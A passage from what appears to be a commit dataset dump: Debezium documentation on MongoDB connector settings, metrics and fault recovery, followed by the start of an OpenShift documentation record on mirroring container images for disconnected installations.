instances.\n\n|[[mongodb-property-mongodb-ssl-invalid-hostname-allowed]]<<mongodb-property-mongodb-ssl-invalid-hostname-allowed, `+mongodb.ssl.invalid.hostname.allowed+`>>\n|`false`\n|When SSL is enabled, this setting controls whether strict hostname checking is disabled during the connection phase. If `true`, the connection does not prevent man-in-the-middle attacks.\n\n|[[mongodb-property-database-include-list]]<<mongodb-property-database-include-list, `+database.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in `database.include.list` is excluded from monitoring. By default, all databases are monitored.\nMust not be used with `database.exclude.list`.\n\n|[[mongodb-property-database-exclude-list]]<<mongodb-property-database-exclude-list, `+database.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in `database.exclude.list` is monitored.\nMust not be used with `database.include.list`.\n\n|[[mongodb-property-collection-include-list]]<<mongodb-property-collection-include-list, `+collection.include.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be monitored; any collection not included in `collection.include.list` is excluded from monitoring. 
Each identifier is of the form _databaseName_._collectionName_. By default, the connector will monitor all collections except those in the `local` and `admin` databases.\nMust not be used with `collection.exclude.list`.\n\n|[[mongodb-property-collection-exclude-list]]<<mongodb-property-collection-exclude-list, `+collection.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified namespaces for MongoDB collections to be excluded from monitoring; any collection not included in `collection.exclude.list` is monitored. Each identifier is of the form _databaseName_._collectionName_.\nMust not be used with `collection.include.list`.\n\n|[[mongodb-property-snapshot-mode]]<<mongodb-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is *initial*, and specifies that the connector reads a snapshot when either no offset is found or the oplog\/change stream no longer contains the previous offset. The *never* option specifies that the connector should never use snapshots; instead, the connector proceeds to tail the log.\n\n|[[mongodb-property-capture-mode]]<<mongodb-property-capture-mode, `+capture.mode+`>>\n|`change_streams_update_full`\n|Specifies the method used to capture changes from the MongoDB server. The default is *change_streams_update_full*, and specifies that the connector captures changes via the MongoDB Change Streams mechanism, and that _update_ events should contain the full document. The *change_streams* mode will use the same capturing method, but _update_ events won't contain the full document. +\nThe *oplog* mode specifies that the MongoDB oplog will be accessed directly; this is the legacy method and should not be used for new connector instances.\n\n|[[mongodb-property-snapshot-include-collection-list]]<<mongodb-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>\n| All collections specified in `collection.include.list`\n|An optional, comma-separated list of regular expressions that match names of collections specified in `collection.include.list` for which you *want* to take the snapshot.\n\n|[[mongodb-property-field-exclude-list]]<<mongodb-property-field-exclude-list, `+field.exclude.list+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified names of fields that should be excluded from change event message values. Fully-qualified names for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters.\n\n|[[mongodb-property-field-renames]]<<mongodb-property-field-renames, `+field.renames+`>>\n|_empty string_\n|An optional comma-separated list of the fully-qualified replacements of fields that should be used to rename fields in change event message values. Fully-qualified replacements for fields are of the form _databaseName_._collectionName_._fieldName_._nestedFieldName_:__newNestedFieldName__, where _databaseName_ and _collectionName_ may contain the wildcard (*) which matches any characters; the colon character (:) is used to determine the rename mapping of the field. 
The next field replacement is applied to the result of the previous field replacement in the list, so keep this in mind when renaming multiple fields that are in the same path.\n\n|[[mongodb-property-tasks-max]]<<mongodb-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The MongoDB connector will attempt to use a separate task for each replica set, so the default is acceptable when using the connector with a single MongoDB replica set. When using the connector with a MongoDB sharded cluster, we recommend specifying a value that is equal to or more than the number of shards in the cluster, so that the work for each replica set can be distributed by Kafka Connect.\n\n|[[mongodb-property-snapshot-max-threads]]<<mongodb-property-snapshot-max-threads, `+snapshot.max.threads+`>>\n|`1`\n|Positive integer value that specifies the maximum number of threads used to perform an initial sync of the collections in a replica set. Defaults to 1.\n\n|[[mongodb-property-tombstones-on-delete]]<<mongodb-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted document in case {link-kafka-docs}\/#compaction[log compaction] is enabled for the topic.\n\n|[[mongodb-property-snapshot-delay-ms]]<<mongodb-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up. +\nThis can be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|[[mongodb-property-snapshot-fetch-size]]<<mongodb-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`0`\n|Specifies the maximum number of documents that should be read in one go from each collection while taking a snapshot.\nThe connector will read the collection contents in multiple batches of this size. +\nDefaults to 0, which indicates that the server chooses an appropriate fetch size.\n\n|[[mongodb-property-schema-name-adjustment-mode]]<<mongodb-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>\n|avro\n|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +\n\n* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +\n* `none` does not apply any adjustment. +\n\n|===\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[id=\"debezium-mongodb-connector-advanced-configuration-properties\"]\n.{prodname} MongoDB connector advanced configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property\n|Default\n|Description\n\n|[[mongodb-property-max-batch-size]]<<mongodb-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. 
Defaults to 2048.\n\n|[[mongodb-property-max-queue-size]]<<mongodb-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value that specifies the maximum number of records that the blocking queue can hold.\nWhen {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.\nThe blocking queue can provide backpressure for reading change events from the database\nin cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.\nEvents that are held in the queue are disregarded when the connector periodically records offsets.\nAlways set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].\n\n|[[mongodb-property-max-queue-size-in-bytes]]<<mongodb-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|A long integer value that specifies the maximum volume of the blocking queue in bytes.\nBy default, volume limits are not specified for the blocking queue.\nTo specify the number of bytes that the queue can consume, set this property to a positive long value. +\nIf xref:mongodb-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.\nFor example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.\n\n|[[mongodb-property-poll-interval-ms]]<<mongodb-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mongodb-property-connect-backoff-initial-delay-ms]]<<mongodb-property-connect-backoff-initial-delay-ms, `+connect.backoff.initial.delay.ms+`>>\n|`1000`\n|Positive integer value that specifies the initial delay when trying to reconnect to a primary after the first failed connection attempt or when no primary is available. Defaults to 1 second (1000 ms).\n\n|[[mongodb-property-connect-backoff-max-delay-ms]]<<mongodb-property-connect-backoff-max-delay-ms, `+connect.backoff.max.delay.ms+`>>\n|`120000`\n|Positive integer value that specifies the maximum delay when trying to reconnect to a primary after repeated failed connection attempts or when no primary is available. Defaults to 120 seconds (120,000 ms).\n\n|[[mongodb-property-connect-max-attempts]]<<mongodb-property-connect-max-attempts, `+connect.max.attempts+`>>\n|`16`\n|Positive integer value that specifies the maximum number of failed connection attempts to a replica set primary before an exception occurs and the task is aborted. Defaults to 16, which with the defaults for `connect.backoff.initial.delay.ms` and `connect.backoff.max.delay.ms` results in just over 20 minutes of attempts before failing.\n\n|[[mongodb-property-mongodb-members-auto-discover]]<<mongodb-property-mongodb-members-auto-discover, `+mongodb.members.auto.discover+`>>\n|`true`\n|Boolean value that specifies whether the addresses in 'mongodb.hosts' are seeds that should be used to discover all members of the cluster or replica set (`true`), or whether the address(es) in `mongodb.hosts` should be used as is (`false`). 
The default is `true` and should be used in all cases except where MongoDB is xref:{link-mongodb-connector}#mongodb-replicaset[fronted by a proxy].\n\nifdef::community[]\n|[[mongodb-property-source-struct-version]]<<mongodb-property-source-struct-version, `+source.struct.version+`>>\n|v2\n|Schema version for the `source` block in CDC events. {prodname} 0.10 introduced a few breaking +\nchanges to the structure of the `source` block in order to unify the exposed structure across\nall the connectors. +\nBy setting this option to `v1`, the structure used in earlier versions can be produced.\nNote that this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mongodb-property-heartbeat-interval-ms]]<<mongodb-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends messages into a heartbeat topic.\nThis can be used to monitor whether the connector is still receiving change events from the database.\nYou should also use heartbeat messages in cases where only records in non-captured collections are changed for a longer period of time.\nIn such a situation, the connector would proceed to read the oplog\/change stream from the database but never emit any change messages into Kafka,\nwhich in turn means that no offset updates are committed to Kafka.\nThis causes the oplog files to be rotated out without the connector noticing, so after a restart some events are no longer available, which makes re-execution of the initial snapshot necessary.\n\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|[[mongodb-property-sanitize-field-names]]<<mongodb-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` when connector configuration explicitly specifies the `key.converter` or `value.converter` parameters to use Avro, otherwise defaults to `false`.\n|Whether field names are sanitized to adhere to Avro naming requirements.\nifdef::community[]\nSee xref:{link-avro-serialization}#avro-naming[Avro naming] for more details.\nendif::community[]\n\n|[[mongodb-property-skipped-operations]]<<mongodb-property-skipped-operations, `+skipped.operations+`>>\n|\n|A comma-separated list of operation types that will be skipped during streaming.\nThe operations include: `c` for inserts\/create, `u` for updates, and `d` for deletes.\nBy default, no operations are skipped.\n\n|[[mongodb-property-snapshot-collection-filter-overrides]]<<mongodb-property-snapshot-collection-filter-overrides, `+snapshot.collection.filter.overrides+`>>\n|\n| Controls which collection items are included in a snapshot. This property affects snapshots only. Specify a comma-separated list of collection names in the form _databaseName.collectionName_.\n\nFor each collection that you specify, also specify another configuration property: `snapshot.collection.filter.overrides._databaseName_._collectionName_`. For example, the name of the other configuration property might be: `snapshot.collection.filter.overrides.customers.orders`. Set this property to a valid filter expression that retrieves only the items that you want in the snapshot. 
When the connector performs a snapshot, it retrieves only the items that match the filter expression.\n\n\n|[[mongodb-property-provide-transaction-metadata]]<<mongodb-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|When set to `true`, {prodname} generates events with transaction boundaries and enriches the data event envelope with transaction metadata.\n\nSee xref:{link-mongodb-connector}#mongodb-transaction-metadata[Transaction Metadata] for additional details.\n\n|[[mongodb-property-retriable-restart-connector-wait-ms]]<<mongodb-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|[[mongodb-property-mongodb-poll-interval-ms]]<<mongodb-property-mongodb-poll-interval-ms, `+mongodb.poll.interval.ms+`>>\n|`30000`\n|The interval in which the connector polls for new, removed, or changed replica sets.\n\n|[[mongodb-property-mongodb-connect-timeout-ms]]<<mongodb-property-mongodb-connect-timeout-ms, `+mongodb.connect.timeout.ms+`>>\n|10000 (10 seconds)\n|The number of milliseconds the driver will wait before a new connection attempt is aborted.\n\n|[[mongodb-property-mongodb-socket-timeout-ms]]<<mongodb-property-mongodb-socket-timeout-ms, `+mongodb.socket.timeout.ms+`>>\n|0\n|The number of milliseconds that a send\/receive on the socket can take before a timeout occurs.\nA value of `0` disables this behavior.\n\n|[[mongodb-property-mongodb-server-selection-timeout-ms]]<<mongodb-property-mongodb-server-selection-timeout-ms, `+mongodb.server.selection.timeout.ms+`>>\n|30000 (30 seconds)\n|The number of milliseconds the driver will wait to select a server before it times out and throws an error.\n\n|[[mongodb-property-cursor-max-await-time-ms]]<<mongodb-property-cursor-max-await-time-ms, `+cursor.max.await.time.ms+`>>\n|`0`\n|Specifies the maximum number of milliseconds the oplog\/change stream cursor will wait for the server to produce a result before causing an execution timeout exception.\nA value of `0` indicates using the server\/driver default wait timeout.\n\n|[[mongodb-property-signal-data-collection]]<<mongodb-property-signal-data-collection, `+signal.data.collection+`>>\n|No default\n| Fully-qualified name of the data collection that is used to send {link-prefix}:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector.\nUse the following format to specify the collection name: +\n`_<databaseName>_._<collectionName>_` +\nifdef::product[]\nSignaling is a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-incremental-snapshot-chunk-size]]<<mongodb-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of documents that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment. 
+\nifdef::product[]\nIncremental snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nendif::product[]\n\n|[[mongodb-property-topic-naming-strategy]]<<mongodb-property-topic-naming-strategy, `topic.naming.strategy`>>\n|`io.debezium.schema.DefaultTopicNamingStrategy`\n|The name of the `TopicNamingStrategy` class that should be used to determine the topic names for data change, schema change, transaction, and heartbeat events. Defaults to `DefaultTopicNamingStrategy`.\n\n|[[mongodb-property-topic-delimiter]]<<mongodb-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specifies the delimiter for topic names. Defaults to `.`.\n\n|[[mongodb-property-topic-prefix]]<<mongodb-property-topic-prefix, `topic.prefix`>>\n|`${mongodb.name}`\n|The prefix to be used for all topic names. Defaults to xref:mongodb-property-mongodb-name[`${mongodb.name}`].\n[NOTE]\n====\nOnce you specify a value for this property, xref:mongodb-property-mongodb-name[`${mongodb.name}`] no longer serves as the prefix for topic names.\n====\n\n|[[mongodb-property-topic-cache-size]]<<mongodb-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size of the bounded concurrent hash map that is used to hold topic names. This cache helps to determine the topic name that corresponds to a given data collection.\n\n|[[mongodb-property-topic-heartbeat-prefix]]<<mongodb-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mongodb-property-topic-transaction]]<<mongodb-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. 
The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the database server name or topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-performance\n\/\/ Title: Monitoring {prodname} MongoDB connector performance\n[[mongodb-monitoring]]\n== Monitoring\n\nThe {prodname} MongoDB connector has two metric types in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect have.\n\n* xref:{link-mongodb-connector}#mongodb-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* xref:{link-mongodb-connector}#mongodb-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\nThe xref:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details about how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-mongodb-snapshots\n\/\/ Title: Monitoring {prodname} during MongoDB snapshots\n[[mongodb-snapshot-metrics]]\n=== Snapshot Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom snapshot metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mongodb-connector-record-streaming\n\/\/ Title: Monitoring {prodname} MongoDB connector record streaming\n[[mongodb-streaming-metrics]]\n=== Streaming Metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=mongodb-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MongoDB connector also provides the following custom streaming metrics:\n\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`NumberOfDisconnects`\n|`long`\n|Number of database disconnects.\n\n|`NumberOfPrimaryElections`\n|`long`\n|Number of primary node elections.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mongodb-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MongoDB connectors handle faults and problems\n[[mongodb-when-things-go-wrong]]\n== MongoDB connector common issues\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event.\nWhen the system is operating normally and is managed carefully, then {prodname} provides _exactly once_ delivery of every change event.\n\nIf a fault occurs, the system does not lose any events.\nHowever, while it is recovering from the fault, it might repeat some change events.\nIn such situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector handles various kinds of faults and 
problems.\n\n* xref:debezium-mongodb-connector-configuration-and-startup-errors[]\n* xref:mongodb-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mongodb-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mongodb-kafka-connect-process-crashes[]\n* xref:debezium-mongodb-kafka-process-becomes-unavailable[]\n* xref:debezium-mongodb-connector-is-stopped-for-a-long-interval[]\n* xref:mongodb-crash-results-in-lost-commits[]\n\nendif::product[]\n\n[id=\"debezium-mongodb-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to MongoDB by using the specified connection parameters.\n\nAfter a failure, the connector attempts to reconnect by using exponential backoff.\nYou can configure the maximum number of reconnection attempts.\n\nIn these cases, the error will have more details about the problem and possibly a suggested workaround. The connector can be restarted when the configuration has been corrected or the MongoDB problem has been addressed.\n\n[id=\"mongodb-becomes-unavailable-while-debezium-is-running\"]\n=== MongoDB becomes unavailable\n\nOnce the connector is running, if the primary node of any of the MongoDB replica sets becomes unavailable or unreachable, the connector will repeatedly attempt to reconnect to the primary node, using exponential backoff to prevent saturating the network or servers. If the primary remains unavailable after the configurable number of connection attempts, the connector will fail.\n\nThe attempts to reconnect are controlled by three properties:\n\n* `connect.backoff.initial.delay.ms` - The delay before attempting to reconnect for the first time, with a default of 1 second (1000 milliseconds).\n* `connect.backoff.max.delay.ms` - The maximum delay before attempting to reconnect, with a default of 120 seconds (120,000 milliseconds).\n* `connect.max.attempts` - The maximum number of attempts before an error is produced, with a default of 16.\n\nEach delay is double that of the prior delay, up to the maximum delay.
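\n\nThe resulting schedule can be reproduced with a short shell sketch; this is an illustration only, using the default values listed above:\n\n[source,shell]\n----\ndelay=1; total=0\nfor attempt in $(seq 1 16); do\n total=$((total + delay))\n printf 'attempt=%2d delay=%3ds total=%4ds\\n' \"$attempt\" \"$delay\" \"$total\"\n delay=$((delay * 2))\n [ \"$delay\" -gt 120 ] && delay=120\ndone\n----\n\n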
Given the default values, the following table shows the delay for each failed connection attempt and the total accumulated time before failure.\n\n[cols=\"30%a,30%a,40%a\",options=\"header\"]\n|===\n|Reconnection attempt number\n|Delay before attempt, in seconds\n|Total delay before attempt, in minutes and seconds\n\n|1 |1 |00:01\n|2 |2 |00:03\n|3 |4 |00:07\n|4 |8 |00:15\n|5 |16 |00:31\n|6 |32 |01:03\n|7 |64 |02:07\n|8 |120|04:07\n|9 |120|06:07\n|10 |120|08:07\n|11 |120|10:07\n|12 |120|12:07\n|13 |120|14:07\n|14 |120|16:07\n|15 |120|18:07\n|16 |120|20:07\n|===\n\n[id=\"debezium-mongodb-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that process, Kafka Connect will migrate all of the process' connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off.\nThere is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\nIf the group contains only one process and that process is stopped gracefully, then Kafka Connect will stop the connector and record the last offset for each replica set. Upon restart, the replica set tasks will continue exactly where they left off.\n\n[id=\"debezium-mongodb-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connect process stops unexpectedly, then any connector tasks it was running will terminate without recording their most recently processed offsets.\nWhen Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes.\nHowever, the MongoDB connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash.\nThe number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\n[NOTE]\n====\nBecause some events may be duplicated during a recovery from failure, consumers should always be prepared to handle duplicates. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\n{prodname} also includes with each change event message the source-specific information about the origin of the event, including the MongoDB event's unique transaction identifier (`h`) and timestamp (`sec` and `ord`). Consumers can keep track of these values to know whether they have already seen a particular event.\n====\n\n[id=\"debezium-mongodb-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency that you have specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. 
In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n[id=\"debezium-mongodb-connector-is-stopped-for-a-long-interval\"]\n=== Connector is stopped for a long interval\n\nIf the connector is gracefully stopped, the replica sets can continue to be used and any new changes are recorded in MongoDB's oplog.\nWhen the connector is restarted, it will resume streaming changes for each replica set where it last left off, recording change events for all of the changes that were made while the connector was stopped.\nIf the connector is stopped long enough such that MongoDB purges from its oplog some operations that the connector has not read, then upon startup the connector will perform a snapshot.\n\nA properly configured Kafka cluster is capable of massive throughput.\nKafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events.\nBecause of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MongoDB.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MongoDB might purge older oplog files and the connector's last position may be lost.\nIn this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MongoDB server will no longer have the starting point and the connector will fail with an error.\n====\n\n[id=\"mongodb-crash-results-in-lost-commits\"]\n=== MongoDB loses writes\n\nIn certain failure situations, MongoDB can lose commits, which results in the MongoDB connector being unable to capture the lost changes.\nFor example, if the primary crashes suddenly after it applies a change and records the change to its oplog, the oplog might become unavailable before secondary nodes can read its contents.\nAs a result, the secondary node that is elected as the new primary node might be missing the most recent changes from its oplog.\n\nAt this time, there is no way to prevent this side effect in MongoDB.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68ab1e00d5c14a6594f0bdf20ecf4eccb1ca00c4","subject":"Removed Important block from Mirroring images for a disconnected installation prerequisites","message":"Removed Important block from Mirroring images for a disconnected installation prerequisites\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"installing\/installing-mirroring-installation-images.adoc","new_file":"installing\/installing-mirroring-installation-images.adoc","new_contents":"[id=\"installing-mirroring-installation-images\"]\n= Mirroring images for a disconnected installation\ninclude::modules\/common-attributes.adoc[]\n:context: installing-mirroring-installation-images\n\ntoc::[]\n\nBefore you install a cluster on infrastructure that you provision in a restricted network, you must mirror the required container images into that environment. 
You can also use this procedure in unrestricted networks to ensure your clusters only use container images that have satisfied your organizational controls on external content.\n\n[IMPORTANT]\n====\nYou must have access to the internet to obtain the necessary container images.\nIn this procedure, you place the mirror registry on a mirror host\nthat has access to both your network and the Internet. If you do not have access\nto a mirror host, use the disconnected procedure to copy images to a device you\ncan move across network boundaries with.\n====\n\n[id=\"prerequisites_installing-mirroring-installation-images\"]\n== Prerequisites\n\n* You must have a container image registry that supports link:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2] in the location that will host the {product-title} cluster, such as one of the following registries:\n+\n--\n** link:https:\/\/www.redhat.com\/en\/technologies\/cloud-computing\/quay[Red Hat Quay]\n** link:https:\/\/jfrog.com\/artifactory\/[JFrog Artifactory]\n** link:https:\/\/www.sonatype.com\/products\/repository-oss?topnav=true[Sonatype Nexus Repository]\n** link:https:\/\/goharbor.io\/[Harbor]\n--\n\nIf you have an entitlement to Red Hat Quay, see the documentation on deploying Red Hat Quay link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_for_proof-of-concept_non-production_purposes\/[for proof-of-concept purposes] or link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_quay\/3.5\/html\/deploy_red_hat_quay_on_openshift_with_the_quay_operator\/[by using the Quay Operator]. If you need additional assistance selecting and installing a registry, contact your sales representative or Red Hat support.\n\ninclude::modules\/installation-about-mirror-registry.adoc[leveloffset=+1]\n\n.Additional information\n\nFor information on viewing the CRI-O logs to view the image source, see xref:..\/installing\/validating-an-installation.html#viewing-the-image-pull-source_validating-an-installation[Viewing the image pull source].\n\n[id=\"installing-preparing-mirror\"]\n== Preparing your mirror host\n\nBefore you perform the mirror procedure, you must prepare the host to retrieve content\nand push it to the remote location.\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-adding-registry-pull-secret.adoc[leveloffset=+1]\n\n\/\/This command seems out of place. Where should it really go?\n\/\/\/\/\n[id=\"installing-performing-connected-mirror\"]\n== Performing a mirror while connected to the internet\n\n$ oc adm release mirror OPENSHIFT_VERSION --to MIRROR_REPOSITORY\n\/\/\/\/\n\n\/\/\/\/\n[id=\"installing-restricted-networks-preparations-mirroring\"]\n== Mirroring the content\n\nIn production environments, add the required images to a registry in your restricted network. For non-production environments, you can use the images without a separate registry.\n\n modules\/installation-performing-disconnected-mirror.adoc[leveloffset=+2]\n\n modules\/installation-performing-disconnected-mirror-without-registry.adoc[leveloffset=+2]\n\/\/\/\/\n\ninclude::modules\/installation-mirror-repository.adoc[leveloffset=+1]\n\n[id=\"installing-preparing-samples-operator\"]\n== The Cluster Samples Operator in a disconnected environment\n\nIn a disconnected environment, you must take additional steps after you install a cluster to configure the Cluster Samples Operator. 
Review the following information in preparation.\n\ninclude::modules\/installation-images-samples-disconnected-mirroring-assist.adoc[leveloffset=+2]\n\ninclude::modules\/olm-mirroring-catalog.adoc[leveloffset=+1]\n.Additional resources\n\n* xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-restricted-networks[Using Operator Lifecycle Manager on restricted networks]\n\n[id=\"olm-mirror-catalog-prerequisites_installing-mirroring-installation-images\"]\n=== Prerequisites\n\nMirroring Operator catalogs for use with disconnected clusters has the following prerequisites:\n\n* Workstation with unrestricted network access.\n* `podman` version 1.9.3 or later.\n* If you want to filter, or _prune_, the default catalog and selectively mirror only a subset of Operators, see the following sections:\n** xref:..\/cli_reference\/opm\/cli-opm-install.adoc#cli-opm-install[Installing the opm CLI]\n** xref:..\/operators\/admin\/olm-restricted-networks.adoc#olm-pruning-index-image_olm-restricted-networks[Filtering a SQLite-based index image]\nifndef::openshift-origin[]\n* If you want to mirror a Red Hat-provided catalog, run the following command on your workstation with unrestricted network access to authenticate with `registry.redhat.io`:\n+\n[source,terminal]\n----\n$ podman login registry.redhat.io\n----\nendif::[]\n* Access to a mirror registry that supports\nlink:https:\/\/docs.docker.com\/registry\/spec\/manifest-v2-2\/[Docker v2-2].\n* On your mirror registry, decide which namespace to use for storing mirrored Operator content. For example, you might create an `olm-mirror` namespace.\n* If your mirror registry does not have internet access, connect removable media to your workstation with unrestricted network access.\n* If you are working with private registries, including `registry.redhat.io`, set the `REG_CREDS` environment variable to the file path of your registry credentials for use in later steps. 
